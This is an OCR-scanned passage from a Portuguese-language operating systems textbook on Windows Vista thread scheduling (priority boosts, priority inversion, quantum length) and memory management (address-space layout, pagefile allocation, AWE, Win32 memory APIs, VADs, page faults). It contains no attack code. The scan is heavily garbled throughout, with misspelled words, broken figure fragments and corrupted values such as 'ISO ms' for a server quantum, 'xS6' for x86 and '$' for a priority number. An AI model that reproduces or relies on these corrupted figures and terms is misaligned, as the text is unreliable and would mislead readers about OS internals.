eslendido, ja que eles podem fazer com que os threads de 
tempo real percam seus prazos. 

Usuarios comims nao podem execular threads dc tem¬ 
po reai Se urn thread de usuario foi exeaitado com urna 
prioridade mais alta do quc, digamos, urn tlircad dc tecla- 
do ou mouse e erurou cm laęo, o thread do teclado ou do 
rnouse mmca sera executado e o sistema ficaria pendurado. 
O direiio de alterar a classe de prioridade para tempo real 
rcquer privilegio especial que deve ser permitido na token 
do processo. Os usuarios normais nao possucm tal privilegio. 

Os threads de aplicaęao normaImente sao exeattados 
com prioridades que variam dc I a 15, Com a configu ra- 


Rrioridade 



I Figura 11.13 O Windows Vista suporta 32 prioridades para threads. 
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ęao das pnoridades do processo e do thread, unia aplicaęao 
pode determinar quals threads recebem a prefereneia. Os 
threads ZeroPage sao executados com prioridade 0 c con- 
vertem as paginas livres para paginas somente com zeros. 
Gada processador possui seu próprio thread ZeroPage. 

Gada thread possui u ma prioridade -base definida se- 
gundo a classe de prioridade do processo e a prioridade 
relativa do thread. Entretanto, a prioridade iitilizada para 
determinar em qual das 32 listas um thread pronto sera 
indufdo e determinada pela prioridade atual, que costuma 
ser igual a prioridade-base (mas nao sempre). Sob certas 
condiędcs, a prioridade atuai de um thread de tempo nao 
rcal ć determinada pdo nikleo como estando a ci ma da 
priori da dc-base (mas nunca arima dc 15). Como o vctor 
da Figura I U 3 foi construfdo segundo a prioridade atual, a 
mudanęa nessa prioridade afeta o escalonamento* Os threads 
de tempo real nunca sofrem ajustes. 

Vejamos en tao quando urna prioridade de thread au- 
menta. Primeiro, quando urna operaęao dc E/S termina e 
libera um thread quc esta esperando, a prioridade e au- 
mentada para dar a dc unia oportunidadc de novamente 
executar logo e inidalizar otttra E/S. A ideia aqui c man¬ 
ier os dispusiiivos de E/S ocupados. De ąuanto deve ser 
o a u men to de prioridade depende do dispositivo de E/S. 
Normalnienie 1 para disco, 2 para a porta serial, 6 para o 
teclado e 8 para a płaca de som. 

Em segundo tu gar, ąuando ć Libera do um thread que 
esteja esperando em um semafora, mutex ou outro evento, 
su a prioridade e aumentada de dois mveis se for urn pro¬ 
cesso em primeiro piano (o processo que eon truła a Janda 
para a qual a entrada do teclado e enviada) e, caso contra- 
rio, o aumento e de um nfvel. Esse ajuste gera a tenden¬ 
cja de devar a prioridade de processos inierativos acima 
da prioridade de outros processos comuns que estejam em 
mvel S. Por firn, se um thread de GUI desperta — pois ago¬ 
ra urna janela de entrada esta dispomvel — a prioridade 
aumenta pela mesma razao. 

Esses attmentos nao sao para sempre. ELes tern efeito 
imedialo e podem acarretar o reescalonamento de loda a 



CPU. Entretanto, se um thread usar totalmeme seu pró¬ 
prio quantum, ełe perde um ponto e e rebaixado na fila 
do vctor de pnoridades. Se usa outro quantum completo, 
ełe rebaixa para outro mvel, e assim continua, ate que al- 
cancc o nfvcl-ba.se, no qual permanecc ate ser aumentado 
novamcnte. 

Ha um outro caso no qual o sistema se ocupa com as 
pnoridades. Imagine que dois threads estejam trabalhando 
juntos em um problema do tipo produtor-consumidor. O 
trabalho do produtor e mais diffdl, portanto ełe obtem uma 
prioridade alta — por exemplo, 12 — comparada a priori- 
dadc do consumidor, 4. Em determinado ponto, o produtor 
precnche um buffer compartilhado c bloqucia cm um se¬ 
mafora, conformc ilustra a Figura 1 L14(afi 

Antes que o consumidor tenha a oportimidade de 
executar novamente, um outro thread qualquer, com 
prioridade 8, fi ca pronto e comeęa a executar, conforme 
mostra a Figura I1.14(b). Esse thread pode ficar exccu- 
tando ate qttando for capaz, pois, enquanto tiver mai nr 
prioridade, dc vcnccra o consumidor c o produtor, quc 
esta parado. Nessas circunstancias, cnquanto o thread 
com prioridade $ nao desistir, o produtor nunca conse- 
guira ex ecu lar novamenie. 

O Windows resolve esse problema da seguinte manei- 
ra; o sistema sabe quamo tempo sc passou desde que um 
thread pronto executou da ultima vez. Se esse thread ex- 
ccdcu um certo Umiar, cle c movido para a prioridade 15 
por dois quanta. Isso pode dar ao thread a oportimidade dc 
desbloquearo produtor, Depot s quc os dois quanta se esgo- 
tarcm, esse aumento sera abruptamente removido, em vez 
de decair gradualmenie. fi provavel que uma soluęao me- 
lhor fosse penalizar os threads que usam todo seu quantum 
por va rias vezes, reduzindo, assim, sua prioridade. A finał, 
o problema nao foi causado pdo thread faminto, mas pdo 
thread guloso. Esse problema e mais conhecido pelo nome 
inversao de prioridade. 

Algo parerido acontece quando um thread dc priorida¬ 
de 16 obtem um muiex e, por um longo tempo, nao con- 
segiie uma oportimidade de execrilar, deixando faminlos 



/ Gostaria de fazer um up 
no semaforo, mas nunca 
Pronto l 4 J con-segue ser escalonado 


(a) (b) 


I Figura 11.14 Um exem plo de inversao de prioridade. 
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importames threads do sistema que estao esperando um 
rnutex, Esse probkma poderia ser cykado, dentro do sis¬ 
tema operacional, da seguinte nianeira: um thread que 
precisa de um mutex por pouco tempo apenas desabilita o 
escalonamento enąuanto esiiver ocupado. (Em um mulii- 
processador, poderia milizar espera ocupada.) 

Antes de terminar o assunto sobre estalonamen- 
to, corwem dizer algumas palavras sobre o ąuantum. Na 
yersao clieme do Windows, o padrao e 20 ms. Na versao 
para senddores, ć ISO ms. O ąuantum pequeno favorccc 
os usuarios interativos; ja o ąuantum mais longo reduz os 
chav€amentos de coniexto e propiria, portanta urna maior 
eftcienda. Conforme desejado, esses ąuanm predefinidos 
podem ser aumentados manualmente por 2x, 4x ou óx. 

Um ul Lim o comeniario sobre o algoritmo dc escalo¬ 
namento: quando uma nova janeia se torna a janela em 
primeiro piano, todos os seus threads obtem um ąuantum 
maior, a partir de um valor recupcrado do registro. Essa 
alteraęao da mais tempo de CPU a esses threads, o que nor¬ 
ma] menie se traduz em um melhor servięo para a janeia 
que łoi para o primeiro piano. 


11.5 


Gerenciamento de memória 


O Windows Vista tern um sistema de memória virmal 
exlremamente sofisticado. Ele dispoe de diversas funęóes 
Win32 para usar a memória virtual, implemeniadas pdo 
gerendador dc memória — o maior componcntc da ca- 
mada executiva NTGS. Nas próximas seęoes estudaremos 
os conceilos fundamenta^, as chamadas API Win32 c, por 
firn, a implementaęao. 


11-5.11 Conceitos fundamentais 

No Windows Vista, lodo processo de usuario Lem seu 
próprio espaęo de endercęamento virtuai. Nas maąuinas 
xS6 r os endereęos yirtuais sao de 32 bils de largura; portam 
Lo, cada processo tem 4 GB de espaęo de endereęamento 
yiriual que podem ser organizados tanio como 2 GB de 
endereęos para o modo usuario de cada processo on os sis- 
te mas de servidores do Windows podem o p ci on a 1 me me 
configurar o sistema para oferecer 3 GB no modo usua¬ 
rio, Os bytes restames sao utilizados pclo modo nucko. 
Nas maąuinas x64 Juncionando no modo 64 bils, os en¬ 
dereęos podem ter 32 ou 64 bits. Os endereęos de 32 bils 
sao utilizados para os processos em execuęao com WOW64 
para compatibilidade com 32 bits. Como o nucko lem cm 
dcrcęos suficicntes disponweis, esses processos de 32 bits 
podem a ca bar obtendo um espaęo de endercęamento de 
4 GB, caso ąueiram, Tanto nas maąuinas x86 ąuanto nas 
xć4, o espaęo de endereęa niemo e paginado sob dema uda, 
com (a manlio de pa giną fixo de 4 KB — embora em alguns 
casos, conforme veremos a seguir, lambem sejam usadas 
paginas de 4 MB (utilizando somente um diretório dc pa- 
gina e contornando a tabela de paginas correspondeme). 

O esąucma do espaęo dc endercęamento virtual para 
tres processos xSó e mostrado na Figura 1 LI 3 bera sini- 
plificadamente. Os 64KB do topo e da base do espaęo de 
endereęamento virlual de cada processo normalnienie na o 
eslao mapeadas. Essa escollia fol intencional, visando am 
xiliar a idemificaęao de en os de programas. Pomeiros im 
yalidos sao, niuiias vezes, 0 ou -I; porianto, a temativa 
de usados no Windows causa um desvio em vez de gerar 
uma kitura de lixo ou, piór ainda, uma escriia em um kcal 
incorreto da memória. 


4 GB 


Processo A 


2 GB 


Reservatórro nao paginado 


Reservatórro paginado 

Jabelas de pag|rias_d_e A 
Pilhas, dados etc. 
HAL+SO 


Dados do sistema 


Códigos e dados 
privados ao 
processo A 
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Reservatório paginado 
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Processo C 


Reservatório nao paginado 
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Tabe^ias_de pśgina_s_de C 
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HAL + SO 


Dados do sistema 


Códigos e dados 
privados ao 
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I Figura 11.15 Esquema de espaęos de endereęamento virtual para tres processos de usuario no x86. As areas brancas sao 
particulares de cada processo. As areas sombreadas sao com part ilhadas entre todos os processos. 
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Partindo dos 64 KB vem o código e os dados privados 
do usuario. Isso se estende por quase 2 GB. Os 2 GB supe- 
riores contem o sistema opemrional, indusive código, da- 
dos e reservatórios paginados e nao paginados (usados para 
objctos etc)- Os2 GB superiorcsfomiama meniória Yirtual 
do nuclco, quc ń compartilhada cntrc todos os proccssos 
dos nsuarios, cxccto pelos dados da meniória virluaL como 
tabelas dc paginas c iistas de trabalho, que sao exclusivas de 
ca da proccsso. A memória Yirtual do mkleo somerne esta 
acessfvel quatuio em execuęao no modo nucleo. O motivo 
para o com pa ni lh a niemo da memória vinual do processo 
com o nudeo e que, a o fazer u ma cha ma da de sistema, o 
thread desvia o centrale para o modo nudeo e cominua 
executando sem alterar o mapa da memória. Tu do o que 
precisa ser fcito e altcmar para a pilha do nudeo do thread. 
Como as paginas do proccsso do modo usuario ainda estao 
accssivcis, o código do modo nudeo conscguc ler paranie- 
tros e acessar buffers sem ter dc ir c vir cntrc os espaęos 
dc endereęamento ou ter dc lemporariamcnte duplicar o 
mapa de paginas nos dois espaęos, O compromisso aqui e 
entre menos espaęo privado de endereęameruo por proees- 
so e retorno mais rapido de chamadas de sistema. 

O Windows permite quc os threads sc coiiectem a 
outros espaęos dc endereęamento quando cxccutados no 
modo nuclco. A conexao a espaęos dc endereęamento per- 
mile ao thread acessar todo o espaęo de endereęamento do 
modo usuario, assim como as partes do espaęo de endere- 
ęamento do nudeo espealkas ao proccsso, como o auto- 
mapa para as tabelas de paginas. Os threads devem voitar 
ao espaęo de endereęamento original ames de voitar ao 
modo usuario. 

Alocaęao de endereęo yirtual 

Gada pagina dc endereęamento virtual pode estar cm 
urn de tres estados: invalida, reservada ou comprometida. 
Urna pagina invaltda nao esta atualmente mapeada para 
urn objęto dc seęao de memória, c unia referenda a ela cau¬ 
sa unia falia de pagina que acarreta urna yiolaęao de acesso. 
Urna vez que o código ou os dados estejam mapeados em 
uma pagina yirtual, diz-se que essa pagina esta comprome- 
tida. Uma fali a de pagina em uma pagina comprometida re- 
sulta no mapeamento da pagina que contem a pagina Yirtual 
quc causou a falta em uma das paginas representadas pelo 
objęto da seęao ou armazenadas no arquivo dc paginas, Essa 
ocorrcnda normalmentc rcąucr a alocaęao dc uma pagina 
lisica c a realizaęao de uma operaęao dc J;/$ sobrc o arqui- 
vo represemado pdo objęto da seęao para que sejam lldos 
os dados do disco. Mas as faltas de pagina tambem podcm 
ocorrer simplesmenie porąue a enirada da tabela de paginas 
precisa ser atuatizada, visto quc a pagina lisica continua na 
memória e, portanto, nenii uma operaęao de E/S e neces- 
saria. Essas faltas sao denommadas faltas a pa rent es {wft 
faułt) e falaremos sobrc das em breve, 

Uma pagina Yirtual tambem pode estar no estado re- 
servada. Uma pagina Yirtual reservada e inwalida, mas 


com a partie u landa de de que os endereęos Yirtuais nun- 
ca serao alocados pdo gerendador de memória para ne- 
nluim outro propósito. Por exemplo, quando se cria um 
novo thread, sao reservadas muiras paginas dc espaęo de 
pilha no espaęo dc endereęamento yirtual do proccsso, 
mas somenfe uma pagina fica comprometida. A medi- 
da quc a pilha a u men ta, o gerendador dc memória au- 
tomaticamcnte com pro me te paginas adicionais ate quc 
a reserva esteja quase completa, As paginas rcscrvadas 
funcionam como paginas guardias, evitando que a pilha 
cresęa demais e sobrescreva os dados de outros proccssos. 
A reserva de todas as paginas yirtuais significa que a pilha 
pode eventualmente aumentar ate seu tamanho maximo 
sem correr o risco de que algumas paginas contfguas do 
espaęo de endereęamento Yirtual necessario a pilha sejam 
libera das para outro firn. Al cm dos atributos dc iiwaiida, 
rcscrvada c comprometida, as paginas tambem podcm ter 
atributos que indkpicm sc sao dc leitura, dc escrita ou 
cxecutavel no caso dos processadorcs coińpatfvcis com 
AMD64. 

Arquivo de paginas 

Ha um compromisso interessante na atribuięao da area 
de troca para as paginas compromctidas que nao estejam 
sen do mapeadas para arquivos especfficos, Essas paginas 
usam o arquivo de paginas. A pergunta c como e ąuando 
map car a pagina yirtual para uma localizaęao cspcctlica no 
arquivo dc paginas. Uma estrategia simplcs seria, no mo- 
mento em que a pagina foi comprometida, associar cada 
pagina vinual a uma pagina cm um dos arqnivos dc pagi- 
nas. Isso garamiria haver scrnpre um local conhecido para 
escrcYcr cada pagina comprometida, caso fosse necessario 
desaloja-la da memória. 

O Windows usa uma estrategia As paginas 

compromctidas acompanhadas do arquivo de paginas nao 
rcccbem espaęo nesse arquivo ate que preciscm vokar 
para o disco. Ncniium espaęo em disco c alocado para as 
paginas que nao precisam sair da memória. Se a memória 
yirtual total e menor do que a memória fisica dispomvel, 
nao ha necessidade de um arquivo de paginas, o que e 
conveniente para os sistema s embarcados ba se ad os no 
Windows. Tambem e assim que o sistema c inicializado, 
ja que os arquivos dc paginas nao sao inicializados ate 
que o primciro proccsso no modo usuario, snm.exe, co- 
me cc a funcionar, 

Com a estrategia de pre-alocaęao, loda a memória 
yirtual do sistema utilizada para o armazenamento de da¬ 
dos priyados (pilhas, montes e paginas de código copiar se 
escrita) fica iimitada ao tamanho do arquivo de pciginas. 
Com a alocaęao just-in-time t a memória virtual total pode 
ser tao grandę quanto o tamanho dos arquivos de paginas 
e o da memória ftsica combinados, Comparando os discos, 
cada vez maiores e mais baratos, com a memória fisica, as 
economias de espaęo nao sao tao significativas ątiamo a 
possibilidade de melhora dc desempenho. 
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Com a paginacao sob demanda, as solicitaęoes de lei- 
tura de paginas no disco devein ser prontamente atendi- 
das, pois o thread que encontrou a pagina auseme somente 
pode continuar quando a pagina estiver na memória. As 
possfvcis otimizaęóes para faltas dc paginas na memória 
cnvolvcm a tcntativa dc preparar paginas adicionais na 
mesma opera ęa o de E/S. Entrctanto, as operaęóes quc 
escrevcm as paginas modilicadas no disco nao costiiinam 
manier sineromsmo com a execuęao dos threads, A esira- 
tegi ajm-in-time para aloęaęao de espaęo para o arquivo de 
paginas aproveiia-se disso para aumetuar o desempenho 
da operaęao de escrita de paginas modificadas no arquivo de 
paginas. As paginas modificadas sao agrnpadas e escritas 
em blocos. Como a alocaęao de espaęo no arquivo de pagi¬ 
nas só acontece no moment o da escrita, o nu mero dc buscas 
necessarias a escrita dc urn lotc dc paginas pode ser oti- 
mizado aiocando-sc as paginas do arquivo dc paginas, dc 
forma quc clas fiąuem próximas ou mesmo contiguas. 

Quando as paginas armazenadas no arquivo de pagi¬ 
nas sao carregadas para a memória, elas mantem sua aloca¬ 
ęao no arquivo de paginas ate sofrerem a primeira modifi¬ 
caęao. Sc unia pagina nunca e modificada, ela ira para urna 
lista cspccial dc paginas fisicas livres, chamada dc lista de 
espera, onde pode ser reutilizada sem prerisar ser escrita 
dc volta no disco. Caso seja modifkada, o gcrcnciador dc 
memória d etc eta a modificaęao, libera a pagina do arquivo 
de paginas e a unica cópia da pagina estara na memória. 
O gerenciador de memória implementa isso marcando a 
pagina como somente lei tura depois de ser carregada. No 
primeiro momemo em que urn thread tentar escrever a pa¬ 
gina, o gerenciador de memória detectara essa situaęao e 
liberara a pagina do arqnivo de paginas, garantira direito de 
acesso a pagina c deixara que o thread tente novamente. 

O Windows su porta ate 16 arquivos de paginas normal¬ 
nienie distribuidos ao longo de diferenteś discos de forma a 
alcanęar urna maior banda de E/S. Gada um deles tern tmi 
tamanho inicial e um tamanho maximo para qne ele possa 
crescer, caso seja necessaiio, mas o melhor e criar esses arqui- 
vos com o tamanho maximo durante a instalaęao do sistema. 
Se for necessario aumenta-los quando o sistema estivcr mais 
carregado, c provaveł que o novo espaęo nos arquivos fiquc 
altamcntc fragmentado, o quc diminui o desempenho. 

O sistema operacional com rola a relaęao entre os ma- 
pas de paginas virtuais e o arquivo de paginas por meio da 
escrita dessa informaęao na entrada da tabela de paginas 
para o proccsso para paginas priyadas ou nas entradas da 
tabela de paginas protóiipo associada a o objęto da seęao 
para paginas compartilhadas. Alcm das paginas associadas 
ao arquivo dc paginas, muitas outras no proccsso sao ma- 
pcadas para arquivos simples no sistema dc arquivos. 

O código executavel e os dados somente leitura em 
um arquivo de programa (por exemplo, um arquivo EXE 
ou lima DLL) padem ser mapeados para o espaęo de en¬ 
dereęamento dc qualquer proccsso quc os esteja utilizan- 
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do. Como essas paginas nao podem ser modificadas, elas 
nunca precisam voltar para o disco, mas as paginas fisicas 
somente podem ser reutilizadas depois que todos os ma- 
peamentos da tabela de paginas estejam marcados como 
invaiidos, No futuro, ąuando a pagina for novamcnte ne- 
ccssaria, o gerenciador dc memória lera a pagina a partir 
do arquivo dc programa. 

As vezes as paginas inicializadas como somente leitu- 
ra acabam sendo modificadas. Por exemplo, a definięao de 
um ponto de parada no código durante a depuraęao de um 
programa, ou o ajustc de um código para quc ele seja rea- 
locado para diferenteś cndcrcęos dentro dc urn proccsso, 
ou ainda a modificaęao dc paginas dc dados quc iniriali- 
zaram compartilhadas. Em casos assim, o Windows, bem 
como a maioria dos sistemas operacionais modernos, su- 
poria um tipo de pagina denominado copiar se escrita, 
Paginas desse tipo sao inicializadas como paginas mapeadas 
eomuns e, quando ocorre urna temativa de modificaęao de 
qualquer parte da pagina, o gerenciador de memória faz 
u ma cópia particular passtvel de escrita. Em seguida, ele 
atuaiiza a tabela de paginas com a informaęao sobre a pa¬ 
gina virtual para que da aponte para a cópia particular c 
faz com quc o thread tente escrever novamentc — sabendo 
quc agora dc sera bcm-succdido. Sc, no futuro, a cópia 
prerisar voitar para o disco, da sera escrita no arquivo dc 
paginas, e nao no arquivo odginaL 

Alem de mapear código de programa e dados de ar- 
quivos EXE e DLL, arquivos eomuns Łambem podem ser 
mapeados para a memória, o que pcrmite que programas 
faęam referenda a dados dc arquivos sem realizarem opc- 
raęoes csplidtas dc leitura e escrita. As operaęóes dc E/S 
cominuam sendo necessarias, mas das sao implicitamentc 
ofcrecidas pdo gerenciador dc memória inilizando o objęto 
dc seęao para reprcscniar o mapeamento entre as paginas 
na memória e os blocos nos arquivos em disco. 

Os objetos dc seęao nao precisam fazer referenda a 
um arquivo c podem estar rclacionados a regioes da me¬ 
mória. Com o mapeamento de objetos de seęao anónimos 
cm inuliiplos processos, a memória pode ser comparlilha- 
da sem prerisar alocar um arquivo em disco. Como as se- 
ęóes podem ser noineadas no espaęo de nomes NT, os pro¬ 
cessos podem se encontrar abrindo os objetos pelo nome, 
bem como duplicando mamptiiadores dc objetos de seęao 
entre os processos. 

Endereęamento de memórias fisicas grandes 

Ha muitos anos, ąuando espaęos de endereęamento 
de 16 bits (ou 20) mm usuais mesmo com as maqu3mas 
dispondo de megabytes de memória lisica, todo tipo de ma- 
nobra era pensado, de modo a permitir que os programas 
utiiizassem mais memória ffsica do que a que cabia no es¬ 
paęo de endereęamento. Em geral, essas manobras aconte- 
ciam sob o norne de alternancia entre bancos, na qual 
um programa podia substituir algtirn bloco da memória 
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acima do limite de 16 ou 20 bits por omro de sua própria 
memória. Quando as maquinas de 32 bits fora ni lanęadas, 
grandę parte dos computadores de mesa dispunha de so- 
mente poucos mcgabytcs de meniória fisica. A medida que 
as memorias foram fkando cada vez mais condensadas nos 
dreuitos integrados, cresceu acemuadamente a ąuantidade 
de memória disponwel. Os primeiros semdores de sucesso 
erain aplicaęóes que cos!umavam demandar mais niemo- 
ria. Os processadores Xeon, da Intel, suportavam extensoes 
do endereęo fisico {physkal addms exknsiom — PAE) que 
permitiam quc a memória fisica fosse endereęada com 36 
bils, em vez de 32, o quc significava que inais do que 64 GB 
de memória fisica poderiam ser ineorporados a um unico 
sistema, Isso e muito mais do que os 2 ou 3 GB que urn 
proeesso consegne endereęar com espaęo yirtual de 32 bits 
no modo usuario. Ainda assim, muitas aplicaęoes grandes, 
como bancos de dados $QL, sao projeiadas de modo a fun¬ 
do nar no espaęo dc endereęamento de um unico proeesso, 
o que traz de volia a aliernanria entre bancos, desta vez 
sob o nome de AWE (addms windowmg wtemmu — ex- 
tensoes de janeias de endcreęos) no Windows. Essa fa- 
cilidade permite aos programas com o prmlegio adeąuado 
solidtar a alocaęao de memória fisica, O proeesso que so¬ 
li cita a alocaęao pode, entao, reservar endcreęos vlmiais e 
solidtar quc o sistema operacional mapeie diretamente as 
rcgióes das paginas vinuais para as paginas ffsicas. AWE e 
urn substiuito temporario a te que to dos os semdores uiili- 
zem endereęamento de 64 bits. 

_ 11 -5.2 1 Chamadas de sistema para 

gereiidamento de memória 

A APf Win32 coniem diversas fnnęoes que permitem a 
urn proeesso gerenriar expUcitamente sua memória yirtual. 
As mais importantes estao rdacionadas na Tabela 11.16. 
Todas elas operam em urna regiao formada por urna unica 


pagina ou por urna seąuencia de dnas ou mais paginas que 
sao consecutivas no espaęo de endereęamento virtual. 

As primeiras quatro funęóes da API servem para alo- 
car, liberar r proteger e consuitar rcgióes do espaęo de en- 
dereęaniemo viruial. As regioes alocadas sempre comeęam 
em endcreęos muiliplos de 64 KB para mmimizar os pro- 
blemas de ponabilidade nas futnras arquiteturas, com pagi- 
nas maiores que as atuais. A ąuamidade realnienie alocada 
para o espaęo de eiukreęamento pode ser rncnoi; que 64 
KB, mas dcvc ser urn muHiplo do tamanho da pagina. As 
duas funęóes a segitir dao a urn proeesso a capacidade dc 
manier paginas sempre na memória, de modo quc esias 
nao voltem ao disco, e lambem de desfazer essa operaęao. 
Por exempio, um programa de tempo real pode precisar 
dessa habilidade para evitar faltas dc pagina du ranie opera- 
ęóes cnticas. Um limite i assegurado pclo sistema operado- 
nal para impedir que os processos fiquem muito WorazesT 
Na verdadc, as paginas podem ser removidas da memória, 
mas semenie se o proeesso imeiro for trocado para o dis¬ 
co. Q na udo ele tiver sido trazido de volia, todas as paginas 
serao carregadas antes que quaiquer thread possa comeęar 
a executar novamente. Embora a Tabela 11.16 nao iluś- 
ue esse fato r o Windows Yista tambem possin funęóes API 
para permitir quc um proeesso tenha accsso a memória vir- 
tual de outro proeesso ao qual tenha sido atribufdo o cont ro¬ 
le (isto c, para o qual dc tenha um manipulador, conformc 
mostra a Tabela 11,6). 

As uitimas quatro funęóes API listadas sao para geren- 
ciamento de arquivos mapeados em memória. Para map car 
um arquivo, e prcciso pi imeiro criar um objęto de mape- 
a men to de arqnivo (veja a Tabela 11.16), com CreateFile 
Mapping. Essa funęao retom a um manipulador para o ob¬ 
jęto de mapeamento de arquivos (ou seja, um objęto de 
seęao) e opcionalmente passa iim nonie para ele dentro 
do espaęo de no mes Win 32 e, desse modo, outro pro- 
cesso pode usa-lo. As tkias funęóes seguintes mapetam e 


Funęao API do Win 32 

Descrięao 

Yirtual Al loc 

Reserva ou compromete u ma regiao 

Yirtual Free 

Libera ou descompromete unia regiao 

Yirtual Protect 

Altera a proteęao de leitura/escrita/execuęao de urna regiao 

VirtuaiQuery 

Pergunta sobre o estado de uma regiao 

Yirtual Lock 

Toma uma regiao residente em memória (isto e, desabilita a paginaęao para essa regiao) 

YirtualUnlock 

Torna a regiao paginavel, da maneira usual 

CreateFileMapping 

Cria um objęto de mapeamento de arquivo e (opcionalmente) atribui um nome a ele 

MapYsewOfFile 

Mapeia (parte de) um arquivo no espaęo de endereęamento 

UnmapYiewOfFile 

Remove um arquivo mapeado do espaęo de endereęamento 

OpenFileMapping 

Abne um objęto de mapeamento de arquivo criado anteriormente 


i Tabela 11.16 As principais funęóes API Win32 para gerenciamento de memória yirtual no Windows, 
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desfazem o mapeamento de visóes dos objetos de seęao a 
partir do espaęo cle endereęamento virtuai de um proces¬ 
so. A ultima deJas pode ser usada por um processo para 
compartilhar um mapeamento criado por outro processo 
com CreateFileMapping e norma [menie criado para rnapcar 
memória anonima. Dessa maneira, dois on mais processos 
podem compartilhar regides dc scus espaęos dc endereęa¬ 
mento. Essa tecnica permite-lhes cscrever em regioes eon- 
finadas da memória dc cada um. 

11.5.51 Implementacjo do gerenciamento 
de memória 

Na plataforma x8ó, o Windows Vista suporta, por pro¬ 
cesso, um unico espaęo de endereęamento linear de 4 GB 
com paginas sob demanda. A segmentaęao nao e supor- 
tada cle maneira alguma. Teorica menie, os lamanhos das 
paginas podem ser qualquer potencia de 2 ale 64 KB. No 
Pentium esse li mile esia fixado em 4 KB. Alem disso, o pró- 
prio sistema operacional pode usar paginas de 4 MB para 
a u niema r a efidenda da TLB {tramknion bokaside btifftr — 
tabela de trądu ęao rapida) na unidade de gerenciamento 
de memória do processador. o uso de paginas de 4 MB pelo 
nucleo e grandes aplicaęoes aumenta significativamente o 
desempenho por meto da melhora na taxa de a ceno para 
a TLB e da reduęao do nu mero cle vezcs que a tabela de 
paginas precisa ser varrida para encontrar as entradas que 
nao estao na TLB. 

Diferentemente do c scalona don que sdeciona indivi- 
dualmente os threads para exccutar c naosc preocupa com 
os processos, o gerenciador de memória se preocupa ex- 
dusivamcnte com os processos, nao com os threads. Afinal 
de eon las, sao os processos, nao os threads, que possuem o 
espaęo dc endereęamento e c com isso quc o gerenciador 
de memória se preocupa. Quando urna regiao do espaęo de 
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endereęamento yirtual e alocada — como quatro delas fo¬ 
ra m para o processo A na Figura 11.16 —, o gerenciador de 
memória cna um VAD (yirtual addrns descriptor —descri- 
tor de endereęo yirtual) para ele, contendo o intervalo 
de endereęos mapę a dos, a seęao que representa do arquivo 
de armazenamento de suporte e o deslocamento onde ele 
e map ca do c as pcrmissócs, Quando a primcira pagina e 
tocada, cria-se o diretório de tabelas de paginas e seu en¬ 
dereęo Esico e inserido no objęto processo. Um espaęo de 
endereęamento e totalniente de fi ni do pela lista de seu 
VAD. Os VADs estao organizados em arvores balanceadas, 
de modo que o descritor para um endereęo espedfico possa 
ser localizado de forma efidente. Esse esąuema suporta es- 
paęos de cndereęamenio esparsos, pois areas nao utilizadas 
entre as regioes mapeadas nao empregam recursos (memó¬ 
ria ou disco) que, portanto, estao livres. 

Tratamento de falta de pagina 

No Windows Vista, quando um processo e inicializado, 
rnuitas das paginas mapeando os arquivos imagem dos pro- 
gramas EXE e DLL podem ja estar na memória, pois des sao 
compartiłhados com outros processos. As paginas gravavcis 
das imagens sao marca das como copiar se esaita para qne 
possa m ser compartilhadas atc o m o men to em que preci- 
sem ser modificadas. Sc o sistema operacional rcconhecc 
o EXE dc u ma execuęao anterior, ele pode ter gravado o 
padrao de referenda as paginas utilizando urna tecnologia 
que a Microsoft denomina SuperFetch. Esta lenta prć-pa- 
ginar a mator parte das paginas neeessarias, mesmo que o 
processo ainda nao tenha sentido falta ddas* Esse procedi- 
mento reduza latencia dc inicializar aplicaęoes, pois dispen- 
sa a leitura de paginas do disco por conta da execuęao do 
código dc initializaęao nas imagens, Isto aumenia o ritmo 
dc transfcrencia para o disco, urna vez que e mais facil para 
os driyers organizar as leituras de forma a reduzir o tempo 
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I Figura,11.16 Regioes mapeadas com suas paginas dupiicadas no disco. O arqiiivo bib.dll e mapeado em dois espaęos de 
endereęamento ao mesmo tempo. 
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de busca necessario. A pre-paginaęao de processos nimbem 
e utilizada durante a inicializaęao do sistema, quando urna 
aplicaęao em segundo piano passa para o primeiro p!ano, e 
durante a rcinidalizaęao do sistema após hibernaęao. 

A pre-paginaęao e suponada pdo gerenciador de me- 
mória, mas implementada como um eomponenie sępa rado 
do sistema. As paginas levadas para a memória nao sao inse- 
ridas na tabela de paginas do processo, mas na lista de espera a 
parlir da qual podem ser rapidamente inseridas no processo 
q u a udo necessario, sem necessidade de acesso ao disco. 

As paginas nao mapeadas sao um pouco diferentes, 
pois nao sao inidalizadas a parlir da Lei tura do arquivo. Em 
vez disso, na primeira vez que unia pagina nao mapeada e 
acessada, o gerenciador de memória cria urna nova pagina 
lisica e certilica-se de que sen conteudo seja somente zeros 
(por razoes de seguranęa). Em faltas lutu ras, urna pagina 
nao mapeada pode precisar ser en contra da na memória ou 
foręar unia nova ieitura do arquivo de paginas, 

A paginaęao sob demanda no gerenciador de memória 
e causada pelas faltas de pagina. A cada falia, tem-se um 
desvio do nikleo, que entao constrói um descritor indepen- 
deme de maqlima mdicando o que aconteceu e passa esse 
descritor para a parte do executivo que realiza o gerenda- 
mento de memória. O gerenciador de memória verifica sua 
validadc. Se a pagina que faitou cair em urna rcgiao com- 
prometida ou resemda, de buscara o endereęo na lista dc 
VADs, encontrara (ou criara) a tabda dc paginas c buscara 
u ma entrada relevante, No caso dc urna pagina comparti- 
lhada, o gerenciador de memória utiliza a entrada da tabela 
de paginas protólipo associada ao objęto de seęao para po- 
der preencher a nova entrada da tabela de paginas para as 
tabeias de paginas do processo. 

0 formatu das entradas da tabela de paginas varia de 
acordo com cada arquitetura. Para as aiquiteturas xS6 e 
x64, as entradas para urna pagina mapeada sao mostradas 
na Figura 11.17. Se urna entrada for marcada como valida, 
sens conteudos sao imerpretados pelo hardware de forma 


que o endereęo virmal possa ser trąduzido na pagina fisica 
eorreta. As paginas nao mapeadas tambem leni entradas, 
mas sao marcadas como imdiidm e o hardware ignora o 
restante da entrada. O forma to do software e um pouco 
diferente do forma to do hardware e ć determinado pdo 
gerenciador de memória. For exemplo, para urna pagina 
nao mapeada que deve ser zerada antes de ser usada, esse 
falo e observado na tabela dc paginas, 

Dois bits importantes na entrada da tabela dc pagi¬ 
nas sao atuałizados diretamente pdo hardware: os bits A 
(acesso) e D fsuja). Eles contro lam quando determinado 
mapeamento de pagina foi utilizado para acessar a pagi¬ 
na e se tal acesso pode ter mad i fi ca do a pagina com urna 
operaęao de escrila, Hsse procedimento ajuda bastante no 
desempenho do sistema, pois o gerenciador de memória 
pode fazer uso do bit de acesso para implementar o eslilo 
de paginaęao LRU {kast-recently used — usada menos re- 
centemente). O principio LRU diz que as paginas menos 
